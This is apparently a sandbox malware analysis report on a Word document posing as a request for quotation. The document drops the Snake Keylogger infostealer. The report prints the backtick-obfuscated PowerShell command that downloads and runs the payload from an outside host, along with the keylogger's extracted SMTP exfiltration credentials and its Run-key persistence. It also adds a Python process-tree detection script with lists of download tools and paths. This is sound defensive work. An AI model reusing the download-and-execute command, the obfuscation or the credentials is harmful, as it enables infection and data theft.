Analysis
- max time kernel: 279s
- max time network: 298s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 23-07-2021 14:01

Static task: static1
Behavioral task: behavioral1
- Sample: Specifications_Details_202300_RFQ.doc
- Resource: win7v20210408
Behavioral task: behavioral2
- Sample: Specifications_Details_202300_RFQ.doc
- Resource: win10v20210410
General
- Target: Specifications_Details_202300_RFQ.doc
- Size: 238KB
- MD5: 9efbd937ce6f8fef4ad85ee94d9cfd47
- SHA1: d8eb24e90091238e2f6bd204ea67d54c5c4efdb6
- SHA256: 574ec668750302f0bb7634d757ce2436753a95d6f9610bc227e13abdecbfc6d5
- SHA512: 86e2b112d30a010096fca79fea0bdbd1c927a7548ea172f8e9d763bcca54216b836ae9edd960d9c844ebd862c48360d4c11ef86d6a3822ebd9e469c8ac3d694e
Malware Config
Extracted (download URL)
- http://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe
Extracted (snakekeylogger)
- Protocol: smtp
- Host: netjul.xyz
- Port: 587
- Username: silyatwo@netjul.xyz
- Password: Q;QcczP{&6=~
Signatures
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes: PID 4092 cmd.exe, spawned by PID 508 WINWORD.EXE. Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process.
- Snake Keylogger
  Keylogger and Infostealer first seen in November 2020.
- Downloads MZ/PE file
- Executes dropped EXE (1 IoC)
  Processes: PID 4272 twodark.exe
- Reads data files stored by FTP clients (2 TTPs)
  Tries to access configuration files associated with programs like FileZilla.
- Reads user/profile data of local email clients (2 TTPs)
  Email clients store some user data on disk where infostealers will often target it.
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Adds Run key to start application (2 TTPs, 1 IoC)
  Processes: twodark.exe: Set value (str) \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Windows\CurrentVersion\Run\chrom = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\chrom\\chrom.exe\""
- Looks up external IP address via web service (3 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  Flows: 36 checkip.dyndns.org; 39 freegeoip.app; 40 freegeoip.app
- Suspicious use of SetThreadContext (1 IoC)
  Processes: PID 4208 twodark.exe set thread context of PID 4272 twodark.exe
- Checks processor information in registry (2 TTPs, 3 IoCs)
  Processor information is often read in order to detect sandboxing environments.
  Processes: WINWORD.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0; key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz; key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString
- Enumerates system info in registry (2 TTPs, 3 IoCs)
  Processes: WINWORD.EXE: key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS; key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily; key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU
- Runs ping.exe (1 TTP, 4 IoCs)
  Processes: PID 4524 PING.EXE; PID 4744 PING.EXE; PID 4968 PING.EXE; PID 2192 PING.EXE
- Suspicious behavior: AddClipboardFormatListener (2 IoCs)
  Processes: PID 508 WINWORD.EXE (x2)
- Suspicious behavior: EnumeratesProcesses (18 IoCs)
  Processes: PID 3872 powershell.exe (x3); PID 4356 powershell.exe (x3); PID 4560 powershell.exe (x3); PID 4800 powershell.exe (x3); PID 5020 powershell.exe (x3); PID 4208 twodark.exe (x2); PID 4272 twodark.exe (x1)
- Suspicious use of AdjustPrivilegeToken (7 IoCs)
  Processes (Token: SeDebugPrivilege): PID 3872 powershell.exe; PID 4356 powershell.exe; PID 4560 powershell.exe; PID 4800 powershell.exe; PID 5020 powershell.exe; PID 4208 twodark.exe; PID 4272 twodark.exe
- Suspicious use of SetWindowsHookEx (7 IoCs)
  Processes: PID 508 WINWORD.EXE (x7)
- Suspicious use of WriteProcessMemory (39 IoCs)
  Processes (source PID/image wrote to memory of target PID/image; repeated events collapsed with a count):
  - 508 WINWORD.EXE -> 4092 cmd.exe (x2)
  - 4092 cmd.exe -> 3872 powershell.exe (x2)
  - 3872 powershell.exe -> 4208 twodark.exe (x3)
  - 4208 twodark.exe -> 4356 powershell.exe (x3)
  - 4356 powershell.exe -> 4524 PING.EXE (x3)
  - 4208 twodark.exe -> 4560 powershell.exe (x3)
  - 4560 powershell.exe -> 4744 PING.EXE (x3)
  - 4208 twodark.exe -> 4800 powershell.exe (x3)
  - 4800 powershell.exe -> 4968 PING.EXE (x3)
  - 4208 twodark.exe -> 5020 powershell.exe (x3)
  - 5020 powershell.exe -> 2192 PING.EXE (x3)
  - 4208 twodark.exe -> 4272 twodark.exe (x8)
Processes (indentation shows the parent/child depth; each entry lists the image path, the command line, and the signatures that matched on that process)
- C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
  Command line: "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc" /o ""
  Signatures: Checks processor information in registry; Enumerates system info in registry; Suspicious behavior: AddClipboardFormatListener; Suspicious use of SetWindowsHookEx; Suspicious use of WriteProcessMemory
  - C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\frontcheck.bat" "
    Signatures: Process spawned unexpected child process; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: powershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe
      Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
      - C:\Users\Public\Documents\twodark.exe
        Command line: "C:\Users\Public\Documents\twodark.exe"
        Signatures: Adds Run key to start application; Suspicious use of SetThreadContext; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
        - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com
          Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
          - C:\Windows\SysWOW64\PING.EXE
            Command line: "C:\Windows\system32\PING.EXE" gooogle.com
            Signatures: Runs ping.exe
        (This powershell.exe -> PING.EXE pair appears four times under twodark.exe with identical command lines and signatures, one for each of the powershell.exe PIDs 4356, 4560, 4800 and 5020 listed in the WriteProcessMemory signature.)
        - C:\Users\Admin\AppData\Local\Temp\twodark.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\twodark.exe
          Signatures: Executes dropped EXE; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
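Three details in this tree are worth a detection engineer's attention. The `Start-BitsTransfer` URL is written `htt`p://` so that a naive string match on `http://` misses it; the backtick is PowerShell's escape character and the interpreter sees a plain `http://`. The child powershell.exe and PING.EXE processes have SysWOW64 image paths even though their command lines name System32, which is WoW64 file-system redirection: the parent twodark.exe is a 32-bit process (its memory dumps use 32-bit addresses and its usage log lives under CLR_v4.0_32). And twodark.exe spawning a second copy of itself while the sandbox records SetThreadContext from 4208 to 4272 is the shape of process hollowing, so the 4272 dump at 0x400000-0x424000 is the natural place to look for the injected payload. The script below is an added example, not output of the sandbox or code from the sample: it runs parent/child and command-line rules over constructed process-creation events that mirror this report's tree (PIDs, image paths and command lines are taken from the report; the explorer.exe parent of WINWORD.EXE and the event shape are assumptions).

```python
"""Process-tree detection rules, run over constructed events that mirror the
chain WINWORD.EXE -> cmd.exe -> powershell.exe (Start-BitsTransfer) ->
twodark.exe -> powershell.exe / ping and twodark.exe -> twodark.exe."""
import re
from dataclasses import dataclass

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
DOWNLOAD_TOKENS = ("start-bitstransfer", "invoke-webrequest", "downloadfile",
                   "downloadstring", "bitsadmin", "certutil")
USER_WRITABLE = ("\\users\\public\\", "\\appdata\\", "\\temp\\", "\\programdata\\")
SYSTEM_DIRS = ("c:\\windows\\", "c:\\program files")
# Windows paths ending in a script or binary extension, as they appear in command lines.
PATH_RE = re.compile(r"[a-z]:\\[^\s\"';]+?\.(?:bat|cmd|vbs|ps1|js|exe|dll)")


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the created process
    cmdline: str    # command line as logged


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def normalize_ps(cmdline):
    # The backtick is PowerShell's escape character: "htt`p://" is "http://"
    # once parsed, so strip it before applying string rules.
    return cmdline.replace("`", "").lower()


def analyze(events):
    """Return (pid, rule, detail) tuples for every rule an event trips."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        pname = image_name(parent.image) if parent else ""
        is_ps = name in ("powershell.exe", "pwsh.exe")
        cl = normalize_ps(e.cmdline) if is_ps else e.cmdline.lower()

        # 1. An Office application spawning a shell or script host.
        if pname in OFFICE_PARENTS and name in SHELLS:
            findings.append((e.pid, "office_spawns_shell", f"{pname} -> {name}"))

        # 2. PowerShell with a download cmdlet and a URL in the command line.
        if is_ps:
            urls = re.findall(r"https?://[^\s;'\"]+", cl)
            if urls and any(t in cl for t in DOWNLOAD_TOKENS):
                findings.append((e.pid, "powershell_download", urls[0]))

        # 3. A script or binary run from a user-writable directory (checks both
        #    the command line and the image path; one finding per process).
        for p in PATH_RE.findall(cl) + [e.image.lower()]:
            if any(m in p for m in USER_WRITABLE) and not p.startswith(SYSTEM_DIRS):
                findings.append((e.pid, "user_writable_exec", p))
                break

        # 4. A non-system binary spawning a copy of itself: the shape of process
        #    hollowing. Pair with a SetThreadContext event to confirm it.
        if parent and pname == name and not e.image.lower().startswith(SYSTEM_DIRS):
            findings.append((e.pid, "self_spawn_hollowing", name))

        # 5. PowerShell invoking ping, a cheap delay or connectivity check.
        if pname in ("powershell.exe", "pwsh.exe") and name == "ping.exe":
            findings.append((e.pid, "powershell_ping", e.cmdline))
    return findings


# Constructed events (assumed explorer.exe parent has PID 4); values mirror the report.
SAMPLE_EVENTS = [
    ProcEvent(508, 4, r"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Specifications_Details_202300_RFQ.doc" /o ""'),
    ProcEvent(4092, 508, r"C:\Windows\system32\cmd.exe",
              r'C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Documents\frontcheck.bat" "'),
    ProcEvent(3872, 4092, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w h Start-BitsTransfer -Source htt`p://easyviettravel.vn/vendor/seld/0A3/Specifications_Details_202300_RFQ.exe -Destination C:\Users\Public\Documents\twodark.exe;C:\Users\Public\Documents\twodark.exe"),
    ProcEvent(4208, 3872, r"C:\Users\Public\Documents\twodark.exe",
              r'"C:\Users\Public\Documents\twodark.exe"'),
    ProcEvent(4356, 4208, r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
              r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ping gooogle.com'),
    ProcEvent(4524, 4356, r"C:\Windows\SysWOW64\PING.EXE",
              r'"C:\Windows\system32\PING.EXE" gooogle.com'),
    ProcEvent(4272, 4208, r"C:\Users\Admin\AppData\Local\Temp\twodark.exe",
              r"C:\Users\Admin\AppData\Local\Temp\twodark.exe"),
]

if __name__ == "__main__":
    for pid, rule, detail in analyze(SAMPLE_EVENTS):
        print(f"{pid:>5}  {rule:<22} {detail}")
```

Against the sample events the rules produce eight findings: the Office-to-cmd spawn, the BITS download with the de-escaped URL, the frontcheck.bat and both twodark.exe executions from user-writable paths, the twodark.exe self-spawn, and the ping child; WINWORD.EXE itself and a benign explorer.exe -> WINWORD.EXE chain produce none. Rule 3 deliberately examines the image path as well as the command line, because the second twodark.exe has no arguments and would otherwise be missed.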
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5: e33ed3d4cc9b2e5a08ae25747ef47620
  SHA1: e2f4cfdd39bcb2eb1c05648a37a3d8536eaf19b7
  SHA256: 0e7093450fb6bb5201b4291033daf6099881421ab47b122972e0249ef5b45a4f
  SHA512: 9e990f7ca202c7ecc7a21dd2433055b71bd62f2e524f4702b674316effeb8fa37e891d40f3e6a960380dd7967033c7a7f235e73a3c434e97495e532309b4f95e
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\twodark.exe.log
  MD5: 9e7845217df4a635ec4341c3d52ed685
  SHA1: d65cb39d37392975b038ce503a585adadb805da5
  SHA256: d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b
  SHA512: 307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 26775a2c4cd16b49fce348873add8b2b
  SHA1: 0215a1c53f03e8cc2dd2c618b772f6f42be38ccd
  SHA256: a7e9973343b953a03bd9ee13e7a704e2e8b5556e4b5ac15a535d6025fd4c2764
  SHA512: b73e4d14f4598e537227a7e9870b803777beed387802768635d40a674ec6003a09be62b736315dff4569567f65120eb834b64395311ead7bcb56529ab23ca296
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 1517f2189a3a3bf00de1fbe031c72c8a
  SHA1: 7764187b2273ce4f3dd21d5d23e3a2aa3ebbbfd5
  SHA256: 13e1f6e0cd8c5df88f34bfa538a4fc24a664c00158b2ad6e2eefb4141142ffc5
  SHA512: faa90b13001e97f95c06956e77e7994d3a7cac33595695267eda24854a8fda17627af7c46bf058ebfc3a8936339e994b531f111cb234a3ee9b351920a2862a70
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: b5fa2fa4fd3df8885f7868fe07a83e02
  SHA1: 611709a6018c04f3e4f081c6295f6da68e6cc13f
  SHA256: 7f6c938152ba9e2e2c3f46122a09f92d32aedd09354b75aa28154142cfb7770c
  SHA512: b3e6ad34bb0168a47af5bfd0fba6005ae07fbe07a1d0885caf0d095fba5cde3f643c2be3903a6a8e1848ba3e9da2f45594c3248efe08048c40d5ba4a8cd1919f
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5: 83c19fb800cdb6c2dc4ef021b0c0e3de
  SHA1: e37072a485a36b2af938caa889bb98a9bcfddacf
  SHA256: c32bf0337a8cbf3b2506856f5b3f90d781af2125d80ce27be375332b318ad37b
  SHA512: 0788aeba7a60941f31006ce11cab31162d0f82fa08579e2cba5d9b927da396f0d34b6bebf850980fe87b81decdbbad17af9d43bea2c80be2b6ca22b9608dd2a7
- C:\Users\Admin\AppData\Local\Temp\twodark.exe (listed twice in the report with identical hashes)
  MD5: 288e4cbacba92f857bfd5cf62692606d
  SHA1: 21545f749883d4c24b41ef6fe670978acd424dc6
  SHA256: 7f8a255d199da0a8ba9aff82cc66c1640bd33582fed396cd642502a5acb48233
  SHA512: 654e18ede445e4b12df571ecdbc8cf2408e34e35da227f469eac6ee3ce31963309a1a68e18b1cb9f9f795d92d89461a86033508e4b99eac86bafee272993f3f1
- C:\Users\Public\Documents\frontcheck.bat
  MD5: 87ccb0ab85a10b4b9a47b2d0ef0f37c9
  SHA1: 967fb3ca52c787d984e0e08a2675223c45f96644
  SHA256: a046e1c4e6ff5c4f5702cb4581042bae2c0633700fe5637e30b96adb0206bafd
  SHA512: 4d1d4af7bdf3f7ef5dd734e3d41c6b9b67ea675f6587fa4d2dd0475f37b93b1226ae0aa26c9742e132d4b047272881c2f189cb19e82705c218e982d9bb520dc2
Memory dumps (name, file size; mapping.dmp entries have no size)
- memory/508-122-0x00007FF969780000-0x00007FF96A86E000-memory.dmp, 16.9MB
- memory/508-123-0x00007FF967880000-0x00007FF969775000-memory.dmp, 31.0MB
- memory/508-115-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp, 64KB
- memory/508-116-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp, 64KB
- memory/508-117-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp, 64KB
- memory/508-114-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp, 64KB
- memory/508-119-0x00007FF94EEB0000-0x00007FF94EEC0000-memory.dmp, 64KB
- memory/508-118-0x00007FF9702D0000-0x00007FF972DF3000-memory.dmp, 43.1MB
- memory/2192-489-0x0000000000000000-mapping.dmp
- memory/3872-274-0x00000118C5840000-0x00000118C5841000-memory.dmp, 4KB
- memory/3872-404-0x00000118C56B6000-0x00000118C56B8000-memory.dmp, 8KB
- memory/3872-392-0x00000118C57E0000-0x00000118C57E1000-memory.dmp, 4KB
- memory/3872-352-0x00000118C5670000-0x00000118C5671000-memory.dmp, 4KB
- memory/3872-260-0x0000000000000000-mapping.dmp
- memory/3872-267-0x00000118C56B3000-0x00000118C56B5000-memory.dmp, 8KB
- memory/3872-266-0x00000118C56B0000-0x00000118C56B2000-memory.dmp, 8KB
- memory/3872-265-0x00000118C5640000-0x00000118C5641000-memory.dmp, 4KB
- memory/4092-257-0x0000000000000000-mapping.dmp
- memory/4208-411-0x0000000005730000-0x0000000005731000-memory.dmp, 4KB
- memory/4208-495-0x00000000093E0000-0x000000000944E000-memory.dmp, 440KB
- memory/4208-490-0x0000000006CA0000-0x0000000006CE9000-memory.dmp, 292KB
- memory/4208-415-0x0000000005170000-0x0000000005202000-memory.dmp, 584KB
- memory/4208-414-0x0000000005170000-0x0000000005202000-memory.dmp, 584KB
- memory/4208-413-0x00000000053A0000-0x00000000053A1000-memory.dmp, 4KB
- memory/4208-412-0x0000000005230000-0x0000000005231000-memory.dmp, 4KB
- memory/4208-409-0x0000000000950000-0x0000000000951000-memory.dmp, 4KB
- memory/4208-407-0x0000000000000000-mapping.dmp
- memory/4272-507-0x0000000005890000-0x0000000005891000-memory.dmp, 4KB
- memory/4272-510-0x00000000057F0000-0x0000000005CEE000-memory.dmp, 5.0MB
- memory/4272-500-0x000000000041FFDE-mapping.dmp
- memory/4272-499-0x0000000000400000-0x0000000000424000-memory.dmp, 144KB
- memory/4356-429-0x0000000007E20000-0x0000000007E21000-memory.dmp, 4KB
- memory/4356-421-0x0000000006BC0000-0x0000000006BC1000-memory.dmp, 4KB
- memory/4356-416-0x0000000000000000-mapping.dmp
- memory/4356-447-0x00000000009E3000-0x00000000009E4000-memory.dmp, 4KB
- memory/4356-448-0x00000000009E4000-0x00000000009E6000-memory.dmp, 8KB
- memory/4356-419-0x0000000000FC0000-0x0000000000FC1000-memory.dmp, 4KB
- memory/4356-420-0x0000000006E70000-0x0000000006E71000-memory.dmp, 4KB
- memory/4356-430-0x0000000007C30000-0x0000000007C31000-memory.dmp, 4KB
- memory/4356-422-0x0000000006C60000-0x0000000006C61000-memory.dmp, 4KB
- memory/4356-423-0x0000000006DD0000-0x0000000006DD1000-memory.dmp, 4KB
- memory/4356-428-0x00000000074A0000-0x00000000074A1000-memory.dmp, 4KB
- memory/4356-424-0x00000000009E0000-0x00000000009E1000-memory.dmp, 4KB
- memory/4356-425-0x00000000009E2000-0x00000000009E3000-memory.dmp, 4KB
- memory/4356-426-0x0000000007610000-0x0000000007611000-memory.dmp, 4KB
- memory/4524-431-0x0000000000000000-mapping.dmp
- memory/4560-454-0x0000000000CC4000-0x0000000000CC6000-memory.dmp, 8KB
- memory/4560-446-0x0000000000CC2000-0x0000000000CC3000-memory.dmp, 4KB
- memory/4560-445-0x0000000000CC0000-0x0000000000CC1000-memory.dmp, 4KB
- memory/4560-432-0x0000000000000000-mapping.dmp
- memory/4560-453-0x0000000000CC3000-0x0000000000CC4000-memory.dmp, 4KB
- memory/4744-450-0x0000000000000000-mapping.dmp
- memory/4800-472-0x00000000013C3000-0x00000000013C4000-memory.dmp, 4KB
- memory/4800-469-0x00000000013C2000-0x00000000013C3000-memory.dmp, 4KB
- memory/4800-468-0x00000000013C0000-0x00000000013C1000-memory.dmp, 4KB
- memory/4800-455-0x0000000000000000-mapping.dmp
- memory/4800-473-0x00000000013C4000-0x00000000013C6000-memory.dmp, 8KB
- memory/4968-470-0x0000000000000000-mapping.dmp
- memory/5020-498-0x0000000001104000-0x0000000001106000-memory.dmp, 8KB
- memory/5020-497-0x0000000001103000-0x0000000001104000-memory.dmp, 4KB
- memory/5020-474-0x0000000000000000-mapping.dmp
- memory/5020-488-0x0000000001102000-0x0000000001103000-memory.dmp, 4KB
- memory/5020-487-0x0000000001100000-0x0000000001101000-memory.dmp, 4KB